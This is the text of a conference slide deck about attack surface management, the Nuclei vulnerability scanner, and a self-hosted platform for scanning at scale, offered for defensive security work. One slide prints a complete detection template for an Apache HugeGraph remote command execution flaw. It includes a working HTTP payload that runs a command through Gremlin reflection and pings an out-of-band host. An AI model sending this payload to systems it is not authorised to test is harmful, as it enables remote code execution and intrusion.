Open Source Scalable Security Scanning Platform
Slides URL
Agenda
Open Source Scalable Security Scanning Platform
1
2
3
4
5
6
Introduction
Founder & CTO, VTEM Labs
Open Source Scalable Security Scanning Platform
What is ASM
Open Source Scalable Security Scanning Platform
Attack Surface ManagEment
Open Source Scalable Security Scanning Platform
- Continuous Discovery: Automatically finds all internet-exposed assets (websites, APIs, cloud services, unmanaged subdomains, IoT devices).
- Risk Prioritization: Scores assets based on exposure level, criticality, and known vulnerabilities.
Attack Surface ManagEment
Open Source Scalable Security Scanning Platform
- Integrations: Feed findings into ticketing systems, SOAR platforms, and DevSecOps pipelines for automated remediation.
- Real-Time Monitoring: Alert on newly discovered assets or changes to existing asset configurations.
Attack Surface ManagEment
Open Source Scalable Security Scanning Platform
-
Visibility & Context: Provides business context (e.g., owner, business unit, compliance) to help prioritize the riskiest assets.
nuclei
If you take nothing else from this presentation, go run Nuclei.
Open Source Scalable Security Scanning Platform
what is it
- High-performance vulnerability scanner
- Simple YAML-based vulnerability templates
- Supports multiple protocols: TCP, DNS, HTTP, SSL, WHOIS, JavaScript
- Ultra-fast parallel scanning with request clustering
Open Source Scalable Security Scanning Platform
CLI
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.8
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /Users/ralph/nuclei-templates
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 154
[INF] Templates loaded for current scan: 7607
[INF] Executing 7425 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 182 unsigned templates for scan. Use with caution.
[INF] No results found. Better luck next time!Open Source Scalable Security Scanning Platform
template
id: CVE-2024-27348
info:
name: Apache HugeGraph-Server - Remote Command Execution
author: DhiyaneshDK
severity: high
description: |
Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
reference:
- http://www.openwall.com/lists/oss-security/2024/04/22/3
- https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
- https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
- https://github.com/Zeyad-Azima/CVE-2024-27348
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
- https://nvd.nist.gov/vuln/detail/CVE-2024-27348
classification:
cve-id: CVE-2024-27348
cwe-id: CWE-77
epss-score: 0.00045
epss-percentile: 0.15047
metadata:
verified: true
max-request: 1
shodan-query: title:"HugeGraph"
fofa-query: title="HugeGraph"
tags: cve,cve2024,hugegraph,rce,apache
http:
- raw:
- |
POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(header, "application/json")'
- 'contains(body, "inputStream\":")'
condition: and
# digest: 4a0a004730450221008578493cfb808436d459d2ccb291e869a96890bc1073b44ba502680294d2a06602200ba6baa9516109d23319e018aee1d92b35ea91dc9b6c1c1c1a8ffe673f471f3f:922c64590222798bb761d5b6d8e72950Open Source Scalable Security Scanning Platform
why did we choose it
- Actionable results (high-confidence findings)
- Free and accessible
- Fast!
- Easy to customize with YAML templates
Open Source Scalable Security Scanning Platform
The problem
Open Source Scalable Security Scanning Platform
NUCLEI Scanning at scale
- Need to scan several clients
- Only a CLI / JSON
- Highly customizable scans
- Broad, scalable IP coverage (Blocking)
Open Source Scalable Security Scanning Platform
First attempt CI/CD
- Used Ansible / Terraform
- Triggered scans via CI/CD
- Saved output to an S3 bucket
- Highly scalable — one VM per scan
- Integrated with Jira for deployment and results tracking
Open Source Scalable Security Scanning Platform
CI/CD Problems
- Code-only interfaces - no GUI
- No scan history or audit trails
- Findings may be saved, but state tracking is unreliable
- No integrated database for structured storage
- No search functionality across findings
- Better than manual scans, but lacks visibility and metrics
Open Source Scalable Security Scanning Platform
Next steps
-
Build a web-based platform
-
Design a simple, intuitive UI
-
Enable team collaboration
-
Support large-scale scans with no coding required
-
Visualize and search data easily
Open Source Scalable Security Scanning Platform
what about project desicovery cloud
- High cost (passed on to customers)
- Black-box (what IP address did we use)
- Customer data exposure/retention concerns
- We tested it. It worked, but sometimes it would just fail.
Open Source Scalable Security Scanning Platform
Open Source Scalable Security Scanning Platform
what is it
- OSINT-based asset discovery
- Nuclei scanning at scale
- Self-hosted (no internet exposure required)
- Multi-user
- Multi-cloud
- Simple web interface
Open Source Scalable Security Scanning Platform
diagram
S3 Bucket
Scan1
Scan2
SSH/API
Open Source Scalable Security Scanning Platform
tech stack
- PocketBase (Go backend)
- SQLite DB
- Svelte frontend
- Ansible
- Terraform
Open Source Scalable Security Scanning Platform
demo
May the demo gods bless me...
Open Source Scalable Security Scanning Platform
RELEASE
Open Source Scalable Security Scanning Platform
FUTURE
- Scan chunking (split large scopes)
- Support for more cloud providers
- Better data insights
- Scope enumeration
- LLM integration
- You can be part of this (yes, you!)
Open Source Scalable Security Scanning Platform
Conclusion
Open Source Scalable Security Scanning Platform
RECAP
- Scanning at scale is hard
- Nuclei is highly customizable
- Sometimes, you have to build it yourself
- Collaboration is key — data is power
Open Source Scalable Security Scanning Platform
questions
Open Source Scalable Security Scanning Platform
Bitor - BlackHat 25
By mwgroup
Bitor - BlackHat 25
Discover the intriguing world of Attack Surface Management, explore the power of NUCLEI, and unveil innovative CI/CD solutions while envisioning the future of project discovery cloud. Join us for an insightful journey filled with engaging demos and discussions!
